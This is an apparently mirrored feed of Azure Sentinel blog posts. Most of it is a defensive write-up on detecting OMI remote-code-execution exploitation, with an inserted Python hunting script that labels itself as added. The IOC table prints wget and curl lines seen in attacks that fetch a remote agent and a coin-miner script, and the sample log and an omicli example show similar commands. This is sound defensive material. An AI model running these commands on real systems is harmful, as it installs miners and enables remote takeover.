Base64-encoded. 
It allows you to specify a workspace and time frame and will score and rank Base64 commands within those bounds. It utilizes multiple data sources, primarily focusing on Azure Sentinel Syslog data augmented by telemetry from the MSTIC research branch of the AUOMS audit collection tool.</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> Syslog, Auditd_CL, SecurityAlert, AzureNetworkAnalytics_CL</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, folium, maxminddb_geolite2, BeautifulSoup</P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Hunting – Covid-19 Themed Threats</STRONG></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>Brings together a number of techniques and approaches to allow an analyst to hunt for indicators of Covid-19 themed threats within an organization's data. 
This includes hunting templates for network, cloud and host logs in order to find potentially malicious Covid-19 themed activity.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, OfficeActivity, CommonSecurityLog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp; </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation - Anomaly Lookup</STRONG></P> </TD> <TD width="216.328px" height="219px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="219px" style="vertical-align: top; width: 450px;"> <P>Gain insights into the possible root cause of an alert by searching for related anomalies on the corresponding entities around the alert’s time. This notebook will provide valuable leads for an alert’s investigation, listing all suspicious increases in event counts or their properties around the time of the alert, and linking to the corresponding raw records in Log Analytics for the investigator to focus on and interpret.</P> </TD> <TD width="316.094px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Auditd_CL, OfficeActivity, CommonSecurityLog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp; </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation - Process Alerts</STRONG></P> </TD> <TD width="216.328px" height="138px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="138px" style="vertical-align: top; width: 450px;"> <P>This notebook is intended for triage and investigation of security alerts. It is specifically targeted at alerts triggered by suspicious process activity on Windows hosts. 
Some of the sections will work on other types of alerts but this is not guaranteed.</P> </TD> <TD width="316.094px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> <P>&nbsp;</P> <P><STRONG>External service(s):</STRONG> OTX, VirusTotal, XForce</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation - SolarWinds Post</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook assists defenders in hunting for SolarWinds post-compromise Tactics, Tools and Procedures (TTPs) across both on-premises and cloud data sources.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, AuditLogs, SigninLogs, OfficeActivity</P> <P>&nbsp;</P> <P><STRONG>External service(s):</STRONG> OTX, VirusTotal, XForce</P> </TD> </TR> <TR> <TD width="157.906px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation – Alert Triage</STRONG></P> </TD> <TD width="216.328px" height="219px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="219px" style="vertical-align: top; width: 450px;"> <P>Rapidly triage alerts raised by a range of sources (Azure Sentinel, MDE, MCAS, ASC, etc.) by enriching alert data with Threat Intelligence and OSINT. This notebook is intended to be used by analysts as part of a standard operating procedure. The notebook uses UI widgets and a simple workflow to provide an easy introduction to notebooks for analysts of all levels. 
This notebook uses MSTICpy to connect to Threat Intelligence sources.</P> </TD> <TD width="316.094px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityAlert</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Web Shell Investigation - MDE Sentinel Enrichments</STRONG></P> </TD> <TD width="216.328px" height="138px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="138px" style="vertical-align: top; width: 450px;"> <P>This notebook investigates Microsoft Defender for Endpoint (MDE) web shell alerts. The notebook will guide you through steps to collect MDE alerts for web shell activity and link them to server access logs to identify potential attackers.</P> </TD> <TD width="316.094px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityAlert, W3CIISLog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Hands on - Data Discovery using Azure REST API</STRONG></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook will provide step-by-step instructions and sample code to guide you through Azure authentication and Azure Sentinel data discovery using the Azure REST API.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Hands on - Surfing Your Data using Azure SDK for Python</STRONG></P> </TD> <TD width="216.328px" 
height="111px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook will provide step-by-step instructions and sample code to guide you through Azure authentication and Azure Sentinel log data discovery using the Azure SDK for Python and Kusto Query Language (KQL).</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Machine Learning in Notebooks Examples</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook template guides you through using time series analysis to detect anomalous network activity, clustering to highlight unusual logon sessions, and Markov chains to identify anomalous sequences in events.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> MSTICPy</P> </TD> </TR> </TBODY> </TABLE> </CENTER> <P>&nbsp;</P> <P>These notebooks and more also exist in the official <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repository</A>.&nbsp; This repository contains notebooks contributed by Microsoft and the community to assist hunting and investigation tasks in Azure Sentinel. There are a number of notebooks in the GitHub repository that are valuable additions, but are not supplied automatically when you stand up Azure Sentinel. 
You should regularly review this repository for more, or use the RSS feed to be notified of additions and changes.</P> <P>&nbsp;</P> <P>Notebooks, like all other components and features for Azure Sentinel, are under constant review and undergoing constant improvement. Improvements and changes come from feedback and suggestions from our customers. You can use the DL (<STRONG>asinotebooks@service.microsoft.com</STRONG>) to send your questions, issues, and feedback and our various product teams will monitor and respond.</P> <P>&nbsp;</P> <P>As these updates are made available, we’ll update the Grand List.</P> <P>&nbsp;</P> <P>We are super-excited to be bringing this blog series and the training&nbsp;to you! To register, visit <A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars,</A> look for <STRONG>Azure Sentinel | Become a Notebooks ninja</STRONG> webinar and fill out the registration form.</P> <P>&nbsp;</P> <P>Look for more great knowledge on Azure Sentinel Notebooks as we prepare to deliver Part 4 of this series: How to create your own notebooks from scratch and how to customize the existing ones.</P> <P>&nbsp;</P> <P><STRONG>More reading/tutorial resources:</STRONG></P> <P>&nbsp;</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Notebooks at the Azure Sentinel GitHub Repository</A></LI> <LI><A href="#" target="_blank" rel="noopener">Use Jupyter Notebook to hunt for security threats</A></LI> <LI><A href="#" target="_self">Detect Credential Leaks using Azure Sentinel Notebooks! 
(video)</A></LI> <LI><A href="#" target="_self">Azure Sentinel: Notebooks - Getting Started (video)</A></LI> <LI><A href="#" target="_self">Detect Malicious Base64-Encoded Commands on Linux Hosts (video)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure Sentinel Weekly Newsletter</A></LI> </UL> <P>&nbsp;</P> Tue, 05 Oct 2021 11:59:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-3-overview-of-the-pre-built/ba-p/2768838 rodtrent 2021-10-05T11:59:09Z Hunting for OMI Vulnerability Exploitation with Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093 <P><EM>Russell McDonald, Roberto Rodriguez, and Ajeet Prakash</EM></P> <P><EM>Special thanks to: Ross Bevington&nbsp;</EM></P> <P>&nbsp;</P> <P>Following the September 14<SUP>th</SUP>, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (<A href="#" target="_blank" rel="noopener">CVE-2021-38645</A>, <A href="#" target="_blank" rel="noopener">CVE-2021-38649</A>, <A href="#" target="_blank" rel="noopener">CVE-2021-38648</A>) and one unauthenticated Remote Code Execution (RCE) vulnerability (<A href="#" target="_blank" rel="noopener">CVE-2021-38647</A>) in the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC) have been monitoring for signs of exploitation and investigating detections to further protect customers. Following the <A href="#" target="_self">MSRC guidance</A> to block ports that you aren't using and to ensure the OMI service is patched is a great first step. 
In this blog we share what we have seen of current attacks in the wild, the agents and software involved, indicators for defenders to look for on host machines, and new detections in Azure Sentinel.</P> <P>&nbsp;</P> <H2><FONT size="6"><SPAN>Attacks in the wild</SPAN></FONT></H2> <P>At Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats, and to improve the detection coverage of our security offerings.&nbsp; As part of that work, MSTIC is monitoring for exploitation of the OMI related RCE (CVE-2021-38647).&nbsp; To date we have seen several active exploitation attempts ranging from basic host enumeration (running <EM>uname</EM>, <EM>id</EM>, <EM>ps</EM> commands) to attempts to install a cryptocurrency miner or file share (details are in the Hunting cues section below). We have also seen others in the community report similar behavior, including installs of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270.&nbsp; Due to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we are anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).</P> <P>&nbsp;</P> <H1>What is OMI?</H1> <P>OMI is an open-source project to further the development of a production quality CIMOM implementation. The OMI CIMOM is also designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a much more viable CIM Object Manager for embedded systems and other infrastructure components that have memory constraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most UNIX® systems and Linux. 
In addition to OMI's small footprint, it also demonstrates very high performance.</P> <P>&nbsp;</P> <H1>Unauthenticated remote command execution?</H1> <P>In a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can execute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401 Unauthorized response; instead, the request executes commands with root privileges.</P> <P>More details are available in the <A href="#" target="_blank" rel="noopener">MSRC CVE-2021-38647</A> post and in the <A href="#" target="_blank" rel="noopener">blog post from Wiz</A>, who found the vulnerability.</P> <P>&nbsp;</P> <H1>Endpoint Execution Context</H1> <P>In addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to explore at the endpoint level.</P> <P>&nbsp;</P> <H2>SCXCore Providers</H2> <P>SCXcore, started as the <A href="#" target="_blank" rel="noopener">Microsoft Operations Manager</A> UNIX/Linux Agent, is now used in a host of products including <A href="#" target="_blank" rel="noopener">Microsoft Operations Manager</A>, <A href="#" target="_blank" rel="noopener">Microsoft Azure</A>, and <A href="#" target="_blank" rel="noopener">Microsoft Operations Management Suite</A>.</P> <P>The SCXcore provides a CIMOM provider, based on <A href="#" target="_blank" rel="noopener">OMI</A>, to return logging and statistical information for a UNIX or Linux system. 
There are several providers or classes available through the SCXcore provider which can be used to gather information from an endpoint, such as MemoryStatisticalInformation or FileSystemStatisticalInformation.</P> <P>&nbsp;</P> <P>In addition, there is one support provider named the <STRONG>RunAsProvider</STRONG> which provides the following classes:</P> <UL> <LI>ExecuteCommand: Executes any UNIX/Linux native command</LI> <LI>ExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell</LI> <LI>ExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell</LI> </UL> <P>&nbsp;</P> <H2>Executing Code via ExecuteShellCommand</H2> <P><STRONG>Based on the initial research</STRONG> from Wiz, the following command was used to explore network traffic in order to craft an HTTP request to test the vulnerability:</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%">/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command 'id' timeout 0 }</TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><STRONG>During testing</STRONG>, we used the <A href="#" target="_blank" rel="noopener">Scxadmin tool</A>, available as part of SCX, to increase all logging to VERBOSE and identify additional sources of data. 
The following command was used:</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%">/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose</TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><STRONG>After running public proof-of-concepts</STRONG> to test the vulnerability, we validated that the code was being handled by the RunAsProvider :: Invoke_ExecuteShellCommand class:<span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_0-1632000577051.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311328i401E61FCF1859FDD/image-size/large?v=v2&amp;px=999" role="button" title="russmc_0-1632000577051.png" alt="russmc_0-1632000577051.png" /></span></P> <P><STRONG>Checking logs</STRONG> from auditd via Syslog, we also identified where the code was being executed from:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_1-1632000577059.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311327i200EDE10FF52D3E9/image-size/large?v=v2&amp;px=999" role="button" title="russmc_1-1632000577059.png" alt="russmc_1-1632000577059.png" /></span></P> <P><STRONG>We tested</STRONG> the same in our lab environments, and we observed the same behavior which is shown below:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_2-1632000577065.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311326i5EFD48793B0893FF/image-size/large?v=v2&amp;px=999" role="button" title="russmc_2-1632000577065.png" alt="russmc_2-1632000577065.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Looking at the code</STRONG> behind the components of the RunAs providers, there are some references to it:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_3-1632000577069.png" style="width: 999px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311329iEE7CAA9FEA650BA9/image-size/large?v=v2&amp;px=999" role="button" title="russmc_3-1632000577069.png" alt="russmc_3-1632000577069.png" /></span></P> <P>&nbsp;</P> <P><STRONG>More information</STRONG> about SCXcore is available here:&nbsp;<A href="#" target="_blank" rel="noopener">GitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager</A></P> <P>&nbsp;</P> <H2>Executing Code via ExecuteScript</H2> <P>&nbsp;</P> <P>Similarly, scripts can be run using the ExecuteScript provider. In this case, the body of the HTTP request contains a reference to ExecuteScript.&nbsp; In the example below, the command ‘id’ is base64 encoded as ‘aWQ=’:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_4-1632000577071.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311330i59B13BB9FE16FBD0/image-size/large?v=v2&amp;px=999" role="button" title="russmc_4-1632000577071.png" alt="russmc_4-1632000577071.png" /></span></P> <P>&nbsp;</P> <P>In this case, the script is written to a temp directory, which you can see in the execve logs. Look for a command line similar to <EM>/bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*</EM>. This command will still show as being run from the same <EM>/var/opt/microsoft/scx/tmp</EM> current working directory.</P> <P>Of note, this is the method we have seen attackers use when attempting to install coin miners.</P> <P>&nbsp;</P> <P><FONT size="6">Azure Sentinel coverage</FONT></P> <P>Relevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel makes it easy to collect data from multiple sources. 
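To turn the endpoint cues above (commands launched from the RunAs working directory, the scx-prefixed script path, the base64 script body) into logic you can run over collected execve data, here is a small Python hunt; it is an added example, not code from the original post or from Azure Sentinel. The one-line record shape, the uid field and the example.invalid download host are assumptions, and the sample records are constructed.

```python
"""Surface process executions launched through the OMI/SCX RunAs providers.

Added example, not code from the original post. The records below are
constructed and use a simplified one-line shape (an assumption); auditd via
Syslog actually delivers SYSCALL/CWD/EXECVE records that you would join first.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# From the post: RunAs commands run with this working directory, and
# ExecuteScript drops its script in conf/tmpdir with an "scx" prefix.
SCX_TMP_CWD = "/var/opt/microsoft/scx/tmp"
SCX_SCRIPT_RE = re.compile(r"^/bin/sh\s+/etc/opt/microsoft/scx/conf/tmpdir/scx\S*$")
# Enumeration commands and download utilities seen in the exploitation attempts.
RECON_BINS = {"uname", "id", "ps", "netstat"}
FETCH_BINS = {"wget", "curl"}

# Constructed record shape: pid=<n> uid=<n> cwd=<path> cmdline="<argv joined>"
RECORD_RE = re.compile(r'^pid=(\d+)\s+uid=(\d+)\s+cwd=(\S+)\s+cmdline="(.*)"$')


@dataclass
class ExecRecord:
    pid: int
    uid: int
    cwd: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    provider: str  # "ExecuteScript" or "ExecuteShellCommand"
    cmdline: str
    tags: List[str] = field(default_factory=list)


def parse_record(line: str) -> Optional[ExecRecord]:
    """Parse one constructed record; returns None for lines that do not fit."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    return ExecRecord(int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))


def classify(rec: ExecRecord) -> Optional[Finding]:
    """Return a Finding when the execution came from the SCX tmp directory."""
    if rec.cwd != SCX_TMP_CWD:
        return None
    provider = "ExecuteScript" if SCX_SCRIPT_RE.match(rec.cmdline) else "ExecuteShellCommand"
    finding = Finding(rec.pid, provider, rec.cmdline)
    # Basename of every token: crude, but enough to spot uname/id/ps/netstat and wget/curl.
    bins = {tok.rsplit("/", 1)[-1] for tok in rec.cmdline.split()}
    if bins & RECON_BINS:
        finding.tags.append("recon")
    if bins & FETCH_BINS:
        finding.tags.append("download")
    if rec.uid == 0:
        finding.tags.append("root")  # the post notes the commands run with root privileges
    return finding


def hunt(lines: List[str]) -> List[Finding]:
    """Run every parseable record through classify and keep the hits."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue  # malformed line: skip rather than abort the whole hunt
        f = classify(rec)
        if f is not None:
            findings.append(f)
    return findings


def decode_script_body(b64: str) -> Optional[str]:
    """Decode the base64 script body an ExecuteScript request carries ('aWQ=' -> 'id')."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not valid base64 / not text: report it, do not crash


# Constructed sample: three RunAs executions, one interactive shell, one malformed line.
SAMPLE_LOG = [
    'pid=4010 uid=0 cwd=/var/opt/microsoft/scx/tmp cmdline="/bin/sh -c id"',
    'pid=4011 uid=0 cwd=/var/opt/microsoft/scx/tmp cmdline="/bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scxzOy96"',
    'pid=4012 uid=0 cwd=/var/opt/microsoft/scx/tmp cmdline="/bin/sh -c curl -fSsL hxxp://example.invalid/runMiner.sh"',
    'pid=4013 uid=1000 cwd=/home/azureuser cmdline="/bin/sh -c id"',
    'type=UNKNOWN garbage that does not parse',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"pid={f.pid} provider={f.provider} tags={f.tags} cmd={f.cmdline}")
```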
This section of the post contains guidance and generic approaches to look for OMI related activity in the various data feeds that are available by default in Azure Sentinel or can be onboarded to Azure Sentinel.</P> <P>&nbsp;</P> <P>Some Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI. Attackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via HTTPS to the port on which OMI is listening, gaining initial access to the machine.</P> <P>&nbsp;</P> <P>The Azure Sentinel query linked below tries to identify connection attempts from external IP addresses to the OMI management ports (5985, 5986, 1270). The query primarily leverages the Network Session normalization schema (imNetworkSession) as well as a few other logs to look for this network connection activity from an external IP address. Where available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the query has been shipped as a hunting query.</P> <P>Normalizing parsers for the imNetworkSession normalized schema are required for this query to work and can be deployed with one click using an <A href="#" target="_blank" rel="noopener">ARM Template</A>.</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"><A href="#" target="_blank" rel="noopener">Azure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Customers can also use Heartbeat logs, which monitor agent health, to find vulnerable machines. 
The Azure Sentinel query linked below leverages Heartbeat data to find OMS agents that are reporting to the Azure Sentinel workspace but have not been updated to the version that fixes this vulnerability.</P> <P><FONT size="2" color="#993300">[updated Sept 27, 2021]</FONT></P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"><A href="#" target="_blank" rel="noopener">Azure-Sentinel/OMI_vulnerability_detection.yaml at master · Azure/Azure-Sentinel (github.com)</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Additionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines with OMI installed in an Azure environment. With the <A href="#" target="_blank" rel="noopener">continuous export feature</A> of Security Center, these security recommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data, populated in the Security Nested Recommendations table, to build a detection query that shows vulnerable machines.</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%">&nbsp;<A href="#" target="_blank" rel="noopener">Azure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Azure Service Health has also sent notifications to potentially impacted customers. 
In impacted environments, customers can run a quick query to check whether they are affected by this vulnerability.</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"> <P><EM>AzureActivity<BR />| where CategoryValue == 'ServiceHealth'<BR />| where isnotempty(Properties) and Properties has 'CVE-2021-38645'<BR />| extend defaultLanguageTitle = tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)</EM></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <H1>SCX RunAs Provider</H1> <P><FONT size="2" color="#993300">[updated Sept 24, 2021]</FONT></P> <P>The hunting query below uses security events from the Microsoft Audit Collection Tool (AUOMS), collected via the Azure Sentinel Syslog <A href="#" target="_self">data connector</A>, to explore the use of the SCX Execute RunAs providers.</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A></P> </TD> </TR> </TBODY> </TABLE> <P><BR />Execute RunAs providers such as ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux command or script, respectively, using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and, depending on the RunAs provider used, can be a command or a script. If the ExecuteScript RunAs provider is used, the script file is created in the directory /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx (e.g. scxzOy96) and executed with /bin/sh. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, 
Microsoft Azure, and Microsoft Operations Management Suite.</P> <P>&nbsp;</P> <P><FONT size="6">Hunting cues and IOCs</FONT></P> <TABLE> <TBODY> <TR> <TD width="189"> <P>Common enumeration commands seen</P> </TD> <TD width="435"> <P>uname -a, id, netstat, ps</P> </TD> </TR> <TR> <TD width="189"> <P>Exploitation attempt</P> </TD> <TD width="435"> <P data-unlink="true">wget hxxps://www.dwservice.net/download/dwagent_generic.sh&nbsp; -O dwagent_generic.sh</P> </TD> </TR> <TR> <TD width="189"> <P>Exploitation attempt</P> </TD> <TD width="435"> <P data-unlink="true">echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh&nbsp; --output dw.sh &gt; go.sh</P> </TD> </TR> <TR> <TD width="189"> <P>Exploitation attempt</P> </TD> <TD width="435"> <P>curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><FONT size="6">References:&nbsp;</FONT></P> <P><STRONG>MSRC communications:</STRONG></P> <UL> <LI><A href="#" target="_blank" 
rel="noopener">CVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution Vulnerability</A></LI> <LI><A href="#" target="_blank" rel="noopener">Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security Response Center</A></LI> </UL> <P><STRONG>Azure Security Center Guidance:</STRONG></P> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-security-center/using-asc-to-find-machines-affected-by-omi-vulnerabilities-in/ba-p/2767240" target="_blank" rel="noopener">Using ASC to find&nbsp;machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech Community</A></LI> </UL> <P><STRONG>Sentinel Detections:</STRONG></P> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A>&nbsp;<FONT size="2" color="#993300">[updated Sept 24, 2021]</FONT></LI> </UL> <P><STRONG>Software and tools:</STRONG></P> <UL> <LI><A href="#" target="_blank" rel="noopener">GitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager</A></LI> <LI><A href="#" target="_blank" rel="noopener">GitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)</A></LI> </UL> <H3>Research lab environments:</H3> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> </UL> <P>&nbsp;</P> <P><STRONG>Public Discussion About Attacks in the wild:</STRONG></P> <UL> <LI><A href="#" target="_blank" rel="noopener">chris doman on Twitter: 
":loudspeaker:</img>OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:</img> We took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI is installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3" / Twitter</A></LI> <LI><A href="#" target="_blank" rel="noopener">Andrew Morris on Twitter: "The Azure "OHMIGOD" vulnerability (CVE-2021-38647) is increasing a good bit. ~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN users and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1" / Twitter</A></LI> <LI><A href="#" target="_blank" rel="noopener">Kevin Beaumont on Twitter: "Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given Mirai can enter networks and spread laterally via multiple vulns, this might be problematic. https://t.co/8nXSEcMHYa" / Twitter</A></LI> </UL> <P>&nbsp;</P> Mon, 27 Sep 2021 20:22:26 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093 russmc 2021-09-27T20:22:26Z Unusual MIRAI variant looks for mining infrastructure https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/unusual-mirai-variant-looks-for-mining-infrastructure/ba-p/2756669 <P>At Microsoft the data from attacks that we see against our cloud services informs our security research and investments. Microsoft uses this data, and other sources, to track emerging threats as well as to improve the detection coverage of our security offerings. The results of this benefits customers through products such as Azure Defender and Azure Sentinel.</P> <P>&nbsp;</P> <P data-unlink="true">Microsoft works with a range of partners including academia to develop new ways of analysing and exploring big data sets. 
